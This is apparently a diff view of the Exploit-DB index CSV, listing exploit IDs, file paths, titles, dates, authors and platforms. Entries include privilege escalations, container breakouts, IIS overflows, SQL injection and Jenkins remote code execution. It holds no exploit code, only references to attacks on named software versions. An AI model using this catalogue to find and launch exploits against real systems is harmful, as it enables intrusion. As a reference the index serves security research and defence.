4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10314,6 +10317,7 @@ id,file,description,date,author,type,platform,port
46362,exploits/linux/local/46362.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)",2019-02-13,"Chris Moberly",local,linux,
46370,exploits/windows/local/46370.txt,"exacqVision ESM 5.12.2 - Privilege Escalation",2019-02-14,bzyo,local,windows,
46369,exploits/linux/local/46369.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)",2019-02-13,embargo,local,linux,
46416,exploits/windows/local/46416.txt,"MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - File Permissions SYSTEM Privilege Escalation",2019-02-19,"Mike Siegel",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40871,3 +40875,11 @@ id,file,description,date,author,type,platform,port
46408,exploits/multiple/webapps/46408.txt,"Comodo Dome Firewall 2.7.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,
46413,exploits/jsp/webapps/46413.txt,"Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload",2019-02-18,"Dao Duy Hung",webapps,jsp,
46414,exploits/php/webapps/46414.php,"WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing",2019-02-18,GeekHack,webapps,php,80
46418,exploits/php/webapps/46418.txt,"Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection",2019-02-19,"Deyaa Muhammad",webapps,php,80
46419,exploits/php/webapps/46419.txt,"Listing Hub CMS 1.0 - 'pages.php id' SQL Injection",2019-02-19,"Deyaa Muhammad",webapps,php,80
46420,exploits/php/webapps/46420.txt,"Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting",2019-02-19,"Deyaa Muhammad",webapps,php,80
46423,exploits/php/webapps/46423.txt,"eDirectory - SQL Injection",2019-02-19,"Efrén Díaz",webapps,php,80
46424,exploits/php/webapps/46424.html,"XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting",2019-02-19,"Rafael Pedrero",webapps,php,80
46425,exploits/jsp/webapps/46425.html,"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting",2019-02-19,"Rafael Pedrero",webapps,jsp,
46426,exploits/php/webapps/46426.txt,"Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection",2019-02-19,"Mr Winst0n",webapps,php,80
46427,exploits/java/webapps/46427.txt,"Jenkins - Remote Code Execution",2019-02-19,orange,webapps,java,

Can't render this file because it is too large.